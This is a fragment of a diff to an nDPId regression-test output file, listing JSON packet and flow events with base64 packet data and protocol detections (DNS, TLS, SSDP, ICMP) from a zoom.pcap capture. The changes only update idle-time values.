+00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"zoom.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1569520466355,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569520466355,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADUGBJenY9ekwKgBdRFS1k9+iDZRPj2DQ6AScSDtKQAAAgQFrAQCCArh63OkJZzPXwEDAwc="} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"zoom.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1569520466355,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569520466355,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+Z7AqAF1p2PXpNZPEVI+PYNDfog2UoAQECx8vAAAAQEICiWcz4Xh63Ok"} +01079{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"zoom.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520466316,"flow_last_seen":1569520466355,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569520466355,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"167.99.215.164","src_port":54863,"dst_port":4434,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dati.ntop.org","ja3":"a795593605a13211941d44505b4d1e39","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01133{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"zoom.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520466316,"flow_last_seen":1569520466392,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":659,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1569520466392,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"167.99.215.164","src_port":54863,"dst_port":4434,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dati.ntop.org","ja3":"a795593605a13211941d44505b4d1e39","ja3s":"dd4b012f7a008e741554bd0a4ed12920","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} 00182{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":16,"source":"zoom.pcap","alias":"nDPId-test","layer_type":34969,"global_ts_msec":1569520467785} 00355{"packet_event_id":1,"packet_event_name":"packet","packet_id":16,"source":"zoom.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1569520466531,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"zoom.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520467811,"flow_last_seen":1569520467811,"flow_idle_time":7440000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":1,"thread_ts_msec":1569520467811,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"62.149.152.153","src_port":54341,"dst_port":993,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00532{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"zoom.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1569520467811,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":113,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":113,"pkt_l4_len":79,"thread_ts_msec":1569520467811,"pkt":"EBMx8Tl2KDc3AG3ICABFAABjAABAAEAGoUnAqAF1PpWYmdRFA+E5lpAkp\/QQcoAYEABEHgAAAQEICiWc1TCZh0dJFwMDACpAXTQxH2s8yyXvpDmREm16+\/VcNt\/x\/vlsIce1k7D8R+clMelpc+AJPCA="} -00736{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"zoom.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1569520468207,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":265,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":265,"pkt_l4_len":231,"thread_ts_msec":1569520468207,"pkt":"EBMx8Tl2KDc3AG3ICABFAAD7AABAAEAGtb7AqAF1rNkVSNZGAbt9MLg2pduNV4AYEAjTKAAAAQEICiWc1rxwmChtFgMBAMIBAAC+AwE5BEH329R9hgOe6JDNh5Do5\/IyBg\/qLeMPj9mOGNz+swAAEgAvADMANQA5wAnACsATwBRWAAEAAIP\/AQABAAAAAB0AGwAAGHd3dy5nb29nbGV0YWdtYW5hZ2VyLmNvbQAXAAAABQAFAQAAAAAzdAAAABIAAAAQADAALgJoMgVoMi0xNgVoMi0xNQVoMi0xNAhzcGR5LzMuMQZzcGR5LzMIaHR0cC8xLjEACwACAQAACgAKAAgAHQAXABgAGQ=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"zoom.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520467811,"flow_last_seen":1569520467811,"flow_idle_time":7560000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":1,"thread_ts_msec":1569520467811,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"62.149.152.153","src_port":54341,"dst_port":993,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00532{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"zoom.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1569520467811,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":113,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":113,"pkt_l4_len":79,"thread_ts_msec":1569520467811,"pkt":"EBMx8Tl2KDc3AG3ICABFAABjAABAAEAGoUnAqAF1PpWYmdRFA+E5lpAkp\/QQcoAYEABEHgAAAQEICiWc1TCZh0dJFwMDACpAXTQxH2s8yyXvpDmREm16+\/VcNt\/x\/vlsIce1k7D8R+clMelpc+AJPCA="} +00736{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"zoom.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1569520468207,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":265,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":265,"pkt_l4_len":231,"thread_ts_msec":1569520468207,"pkt":"EBMx8Tl2KDc3AG3ICABFAAD7AABAAEAGtb7AqAF1rNkVSNZGAbt9MLg2pduNV4AYEAjTKAAAAQEICiWc1rxwmChtFgMBAMIBAAC+AwE5BEH329R9hgOe6JDNh5Do5\/IyBg\/qLeMPj9mOGNz+swAAEgAvADMANQA5wAnACsATwBRWAAEAAIP\/AQABAAAAAB0AGwAAGHd3dy5nb29nbGV0YWdtYW5hZ2VyLmNvbQAXAAAABQAFAQAAAAAzdAAAABIAAAAQADAALgJoMgVoMi0xNgVoMi0xNQVoMi0xNAhzcGR5LzMuMQZzcGR5LzMIaHR0cC8xLjEACwACAQAACgAKAAgAHQAXABgAGQ=="} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"zoom.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520468207,"flow_last_seen":1569520468207,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1569520468207,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"239.255.255.250","src_port":57025,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00605{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"zoom.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1569520468207,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1569520468207,"pkt":"AQBef\/\/6KDc3AG3ICABFAACaDxkAAAER+CLAqAF17\/\/\/+t7BB2wAhjkTTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KDQoA"} 00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"zoom.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520468207,"flow_last_seen":1569520468207,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1569520468207,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"239.255.255.250","src_port":57025,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} @@ -30,27 +30,27 @@ 00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"zoom.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520468922,"flow_last_seen":1569520468922,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1569520468922,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":64352,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"},"dns": {"query":"log.zoom.us","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"zoom.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1569520468958,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":87,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":87,"pkt_l4_len":53,"thread_ts_msec":1569520468958,"pkt":"KDc3AG3IEBMx8Tl2CABFAABJ++kAADcRA\/TAqAEBwKgBdQA1+2AANbDee1+BgAABAAEAAAAAA2xvZwR6b29tAnVzAAABAAHADAABAAEAAAA8AAQ0yj7u"} 00776{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":24,"source":"zoom.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569520468922,"flow_last_seen":1569520468958,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":74,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1569520468958,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":64352,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"},"dns": {"query":"log.zoom.us","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.202.62.238"}} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":25,"source":"zoom.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520468959,"flow_last_seen":1569520468959,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569520468959,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.238","src_port":54864,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"zoom.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1569520468959,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569520468959,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGBOPAqAF1NMo+7tZQAbuf1vAbAAAAALAC\/\/+Z4QAAAgQFtAEDAwUBAQgKJZzZqwAAAAAEAgAA"} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":25,"source":"zoom.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520468959,"flow_last_seen":1569520468959,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569520468959,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.238","src_port":54864,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"zoom.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1569520468959,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569520468959,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGBOPAqAF1NMo+7tZQAbuf1vAbAAAAALAC\/\/+Z4QAAAgQFtAEDAwUBAQgKJZzZqwAAAAAEAgAA"} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"zoom.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469036,"flow_last_seen":1569520469036,"flow_idle_time":180000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1569520469036,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":65394,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"zoom.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1569520469036,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":65,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":65,"pkt_l4_len":31,"thread_ts_msec":1569520469036,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAzKPoAAP8RDvnAqAF1wKgBAf9yADUAH9x7wYgBAAABAAAAAAAABWxvY2FsAAAGAAE="} 00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"zoom.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469036,"flow_last_seen":1569520469036,"flow_idle_time":180000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1569520469036,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":65394,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"local","num_queries":0,"num_answers":0,"reply_code":0,"query_type":6,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"zoom.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1569520469067,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569520469067,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0AABAAO4GVu40yj7uwKgBdQG71lCVbT6Un9bwHIASaQOUKgAAAgQFrAEBBAIBAwMM"} -00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"zoom.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1569520469067,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1569520469067,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGBPvAqAF1NMo+7tZQAbuf1vAclW0+lVAQIAAd\/QAA"} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"zoom.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1569520469067,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569520469067,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0AABAAO4GVu40yj7uwKgBdQG71lCVbT6Un9bwHIASaQOUKgAAAgQFrAEBBAIBAwMM"} +00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"zoom.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1569520469067,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1569520469067,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGBPvAqAF1NMo+7tZQAbuf1vAclW0+lVAQIAAd\/QAA"} 00565{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"zoom.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1569520469072,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":140,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":140,"pkt_l4_len":106,"thread_ts_msec":1569520469072,"pkt":"KDc3AG3IEBMx8Tl2CABFAAB+D5oAADcR8A7AqAEBwKgBdQA1\/3IAaoTewYiBgwABAAAAAQAABWxvY2FsAAAGAAEAAAYAAQAACY8AQAFhDHJvb3Qtc2VydmVycwNuZXQABW5zdGxkDHZlcmlzaWduLWdycwNjb20AeFjoeAAABwgAAAOEAAk6gAABUYA="} 00762{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":29,"source":"zoom.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569520469036,"flow_last_seen":1569520469072,"flow_idle_time":180000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":121,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1569520469072,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":65394,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"local","num_queries":1,"num_answers":1,"reply_code":3,"query_type":6,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00545{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"zoom.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469072,"flow_last_seen":1569520469072,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1569520469072,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"zoom.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1569520469072,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1569520469072,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA4d+0AAEABfxHAqAF1wKgBAQMD\/OoAAAAARQAAfg+aAAA3EfAOwKgBAcCoAXUANf9yAGoAAA=="} 00623{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":30,"source":"zoom.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469072,"flow_last_seen":1569520469072,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1569520469072,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":3.637537} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":31,"source":"zoom.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469081,"flow_last_seen":1569520469081,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569520469081,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"13.225.84.182","src_port":54798,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"zoom.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1569520469081,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1569520469081,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAog\/0AAEAG0h7AqAF1DeFUttYOAbuSOQajVAdu1VAQECZHdwAA"} -00838{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"zoom.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520468959,"flow_last_seen":1569520469090,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569520469090,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.238","src_port":54864,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"log.zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"zoom.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1569520469116,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1569520469116,"pkt":"KDc3AG3IEBMx8Tl2CABFAAAoaEVAAO8G\/tUN4VS2wKgBdQG71g5UB27VAAAAAFAEAADwhQAAAAAAAAAA"} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":31,"source":"zoom.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469081,"flow_last_seen":1569520469081,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569520469081,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"13.225.84.182","src_port":54798,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"zoom.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1569520469081,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1569520469081,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAog\/0AAEAG0h7AqAF1DeFUttYOAbuSOQajVAdu1VAQECZHdwAA"} +00838{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"zoom.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520468959,"flow_last_seen":1569520469090,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569520469090,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.238","src_port":54864,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"log.zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"zoom.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1569520469116,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1569520469116,"pkt":"KDc3AG3IEBMx8Tl2CABFAAAoaEVAAO8G\/tUN4VS2wKgBdQG71g5UB27VAAAAAFAEAADwhQAAAAAAAAAA"} 